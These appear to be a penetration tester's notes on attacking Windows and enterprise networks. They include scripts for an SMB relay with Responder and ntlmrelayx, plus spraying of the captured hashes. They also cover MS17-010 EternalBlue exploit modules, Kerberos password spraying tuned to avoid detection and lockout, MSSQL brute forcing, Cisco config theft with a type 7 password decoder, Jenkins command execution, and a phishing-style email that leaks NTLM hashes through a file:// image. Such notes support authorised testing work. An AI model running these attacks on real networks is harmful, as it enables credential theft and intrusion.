
SMB Vulns

Detection

Grep the IP addresses of hosts with 445/tcp open out of your port-scan output and save them to a file, 445.txt.

Run RunFinger.py (Responder/tools) against each host. Use the script utility or tee to save the output, since you will grep it in the next step:

while read -r line; do ./RunFinger.py -i "$line" -g; done <445.txt

Grep the RunFinger.py output for 'MS17-010: True'.
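The three detection steps above as one script. This is an added example, not code from these notes or from Responder; it assumes ./RunFinger.py (Responder/tools) sits in the working directory and that the scan source is nmap's grepable output (-oG). The nmap and RunFinger lines at the bottom are constructed sample data, not real scan results.

```shell
#!/usr/bin/env bash
# Added example: nmap grepable output -> 445.txt -> RunFinger.py -> MS17-010 hits.
# Assumes ./RunFinger.py (Responder/tools) in the working directory. The nmap
# and RunFinger lines at the bottom are constructed sample data, not real scans.
set -eu

# IPs of hosts with 445/tcp open, from nmap -oG output on stdin.
hosts_with_445_open() {
    grep -E '^Host: ' | grep -E '(^|[^0-9])445/open/tcp' | awk '{print $2}' | sort -u
}

# IPs from RunFinger -g lines that report MS17-010: True. RunFinger's grepable
# field layout has changed between Responder versions, so match the literal the
# notes grep for instead of a fixed column.
ms17_010_hosts() {
    grep -F 'MS17-010: True' | grep -oE '([0-9]{1,3}\.){3}[0-9]{1,3}' | sort -u
}

# The sweep itself (needs network access; not invoked here). Everything RunFinger
# prints is kept in runfinger.log via tee, as the notes recommend.
runfinger_sweep() {
    gnmap="$1"                      # e.g. from: nmap -p445 -oG tcp-445.gnmap <targets>
    hosts_with_445_open <"$gnmap" >445.txt
    while read -r ip; do
        ./RunFinger.py -i "$ip" -g
    done <445.txt | tee runfinger.log | ms17_010_hosts >ms17-010-candidates.txt
}

# --- constructed sample data ----------------------------------------------
SAMPLE_GNMAP=$(printf '%s\n' \
    '# Nmap 7.80 scan initiated (constructed)' \
    'Host: 10.0.0.5 ()  Status: Up' \
    'Host: 10.0.0.5 ()  Ports: 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///' \
    'Host: 10.0.0.6 ()  Ports: 445/filtered/tcp//microsoft-ds///' \
    'Host: 10.0.0.7 ()  Ports: 445/open/tcp//microsoft-ds///')

SAMPLE_RUNFINGER=$(printf '%s\n' \
    "['10.0.0.5', Os:'Windows 7/Server 2008R2', Signing:'False', MS17-010: True]" \
    "['10.0.0.7', Os:'Windows 10', Signing:'False', MS17-010: False]")

printf '445 open:\n%s\n' "$(printf '%s\n' "$SAMPLE_GNMAP" | hosts_with_445_open)"
printf 'MS17-010 candidates:\n%s\n' "$(printf '%s\n' "$SAMPLE_RUNFINGER" | ms17_010_hosts)"
```

Filtering on the "445/open/tcp" token rather than on "445" alone keeps filtered and closed ports out of 445.txt, which is what makes the RunFinger loop short.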

-OR-

Metasploit:

use auxiliary/scanner/smb/smb_ms17_010

Exploit:

use auxiliary/admin/smb/ms17_010_command
use exploit/windows/smb/ms17_010_eternalblue
use exploit/windows/smb/ms17_010_eternalblue_win8
use exploit/windows/smb/ms17_010_psexec

SMB Relaying

Run crackmapexec with the --gen-relay-list option to generate a file containing hosts that don't require SMB Signing.

Run Impacket's ntlmrelayx.py with -tf pointing at the file from the previous step (or -t for a single target):

./ntlmrelayx.py [-t <target IP> | -tf <targetsfile from --gen-relay-list>] -l <LOOTDIR> -of <outputfile>

Rerun Responder. Set SMB = Off and HTTP = Off in Responder.conf first, otherwise Responder answers the poisoned connections itself and ntlmrelayx never sees them:

./Responder.py -I <interface> -wrd

Monitor ntlmrelayx output for any hashes that get dumped. If you get some, use crackmapexec to spray hashes across the network to discover systems that reuse the same local administrator account credentials.
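The relay procedure above as one script, together with the Responder.conf change it depends on. This is an added example, not code from these notes, CrackMapExec, Impacket or Responder; the tool names and flags are the real ones, the Responder.conf fragment is constructed, and the attack and spray functions need a live network so they are defined but not run.

```shell
#!/usr/bin/env bash
# Added example, not from the notes: the relay setup as one script, plus the
# Responder.conf change the procedure depends on. With Responder's own SMB and
# HTTP servers left On, Responder takes the poisoned connections itself and
# ntlmrelayx never sees them (or cannot bind 445/80 at all). The Responder.conf
# fragment below is constructed.
set -eu

# Flip "SMB = On" / "HTTP = On" to Off in the given Responder.conf (HTTPS etc. untouched).
disable_responder_smb_http() {
    conf="$1"
    sed -E 's/^(SMB|HTTP)[[:space:]]*=[[:space:]]*On[[:space:]]*$/\1 = Off/' "$conf" >"$conf.tmp"
    mv "$conf.tmp" "$conf"
}

# Succeeds only when neither listener is still On.
responder_relay_ready() {
    ! grep -Eq '^(SMB|HTTP)[[:space:]]*=[[:space:]]*On' "$1"
}

# The steps from the notes (network access; not invoked here).
smb_relay_attack() {
    targets="$1"      # CIDR, range or file accepted by crackmapexec
    iface="$2"        # interface Responder poisons on
    crackmapexec smb "$targets" --gen-relay-list relay-targets.txt   # hosts without SMB signing
    disable_responder_smb_http ./Responder.conf
    responder_relay_ready ./Responder.conf
    ntlmrelayx.py -tf relay-targets.txt -smb2support -l loot -of relayed-hashes &
    relay_pid=$!
    ./Responder.py -I "$iface" -wrd          # runs until Ctrl-C
    kill "$relay_pid"
}

# Once ntlmrelayx dumps a local Administrator hash, spray it to find hosts
# that share the same local admin password.
spray_local_admin_hash() {
    targets="$1"; ntlm_hash="$2"
    crackmapexec smb "$targets" -u Administrator -H "$ntlm_hash" --local-auth
}

# --- constructed Responder.conf fragment ----------------------------------
WORKDIR=$(mktemp -d)
SAMPLE_CONF="$WORKDIR/Responder.conf"
cat >"$SAMPLE_CONF" <<'EOF'
[Responder Core]

; Servers to start
SQL = On
SMB = On
RDP = On
HTTP = On
HTTPS = On
DNS = On
EOF

disable_responder_smb_http "$SAMPLE_CONF"
if responder_relay_ready "$SAMPLE_CONF"; then
    echo "Responder.conf: SMB and HTTP are Off, ntlmrelayx can own 445/80"
fi
cat "$SAMPLE_CONF"
```

-smb2support is there because SMB2-only targets (Windows 10 and recent servers with SMB1 removed) will not complete the relay without it.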

No admin - SOL?

Modifications to ntlmrelayx

  • Ropnop modified ntlmrelayx so that unprivileged SMB connections (a relayed user who is not a local admin) are not "wasted"; two new options were added.

  • --enum-local-admins : if command execution fails, query the local SAM to find out who does have the right privileges.

  • --rid-cycle : if command execution fails, perform a RID cycling attack via LSAT to enumerate domain objects and save the result to a CSV.

  • Ropnop's branch: https://github.com/ropnop/impacket/tree/feature/enum_unprivdn

Password Spraying

Password Guessing with Kerberos (From Ropnop, https://github.com/ropnop/kerberos_windows_scripts)

  • kinit_horizontal_brute.sh : much quieter than SMB spraying. A failed Kerberos pre-authentication does not produce a Logon Failure event (4625); it produces event 4771, "Kerberos pre-authentication failed", on the DC, which is only recorded when Kerberos Authentication Service auditing is enabled and which the blue team is less likely to be watching. Failed pre-auth attempts still increment badPwdCount, so stay under the lockout threshold.

  • Note from Ropnop's slides: Putting an IP address for the DC saves DNS lookups and makes this work faster.

MSSQL

medusa -H scans/mssql-hosts.txt -u sa -P ./default-mssql-passwords.txt -M mssql |tee /root/logs/mssql-passwords.log

Blank password and username-as-password (-e ns):

medusa -H scans/mssql-hosts.txt -u sa -e ns -M mssql |tee /root/logs/mssql-passwords.log

IPMI

Everything that you need to know: https://blog.rapid7.com/2013/07/02/a-penetration-testers-guide-to-ipmi/

Cisco Smart Install

Use SIET or the Metasploit module to test for Smart Install and to download configurations from vulnerable devices. In the downloaded configurations look for plaintext passwords, type 7 passwords (trivially reversible) and SNMP community strings. Try the recovered credentials against the devices themselves, then use them to password spray telnet and ssh across the network. On some devices you can also run a packet capture from the CLI and sift it for credentials.

https://github.com/Sab0tag3d/SIET

Test:

python siet.py -l <file with IP's> -t

Download configs:

python siet.py -l <file with IP's> -g

Crack Type 7 hashes with type7.py (@averagesecguy). The version below is updated for Python 3 and corrects two defects in the listing as copied here: the two-character seed is a decimal offset (00-15), not hex, and the loop must run to the end of the string or the last character of the password is dropped:

#!/usr/bin/env python3
# type7.py - decode Cisco IOS "type 7" passwords.
import sys

# Cisco's fixed XOR key, "dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87" (53 bytes).
V = [0x64, 0x73, 0x66, 0x64, 0x3b, 0x6b, 0x66, 0x6f, 0x41, 0x2c, 0x2e,
    0x69, 0x79, 0x65, 0x77, 0x72, 0x6b, 0x6c, 0x64, 0x4a, 0x4b, 0x44,
    0x48, 0x53, 0x55, 0x42, 0x73, 0x67, 0x76, 0x63, 0x61, 0x36, 0x39,
    0x38, 0x33, 0x34, 0x6e, 0x63, 0x78, 0x76, 0x39, 0x38, 0x37, 0x33,
    0x32, 0x35, 0x34, 0x6b, 0x3b, 0x66, 0x67, 0x38, 0x37]


def decode_type7(pw7):
    # First two characters: starting offset into V, written in decimal (00-15).
    # Remaining characters: one hex byte per password character, each XORed
    # with the next key byte, wrapping around the 53-byte key.
    i = int(pw7[:2], 10)
    r = ""
    for j in range(2, len(pw7), 2):
        h = int(pw7[j:j+2], 16)
        r = r + chr(h ^ V[i])
        i = (i + 1) % 53
    return r


if len(sys.argv) != 2:
    print("Usage: type7.py hash")
    sys.exit(0)

# e.g. 094F471A1A0A and 121A0C041104 both decode to "cisco"
print(decode_type7(sys.argv[1]))

Jenkins Script Console

Execute OS commands from the Groovy script console at /script (needs administrator access to Jenkins; the cmd /c prefix is for a Windows master, drop it on Linux): println "cmd /c whoami".execute().text

Mongodb

Struts2

An exploit for Apache Struts CVE-2017-5638: https://github.com/mazen160/struts-pwn

Exploit Open SMTP Relay

First, set up your box to capture hashes (Responder) or relay them (Impacket ntlmrelayx.py), and put the recipient email addresses in emailaddresses.txt. The file:// image reference in the message body is what triggers the authentication: a Windows mail client that loads the image resolves it as a UNC path (\\[PTK IP address]\pic.jpg) and sends NTLM credentials to your box. Clients that block remote images by default will not.

Content of msg-body.txt:

<p>Hello,</p>
<p>[Insert name/company here] is testing for an open SMTP relay. Please forward this to me once you receive it.</p>
<p>Regards,</p>
<p>[Name]</p>
<p>Security Consultant, Penetration Testing</p>
<p>[Company]</p>
<p>[phone]</p>
<p>[email address]</p>
<p><img src="file://[PTK IP address]/pic.jpg" alt="Download Images" /></p>

Bash shell:

while read -r line; do sendemail -f [from address] -t "$line" -u "Rapid7 open SMTP relay test" -o message-file=msg-body.txt message-content-type=html -s [IP address]:25; done <emailaddresses.txt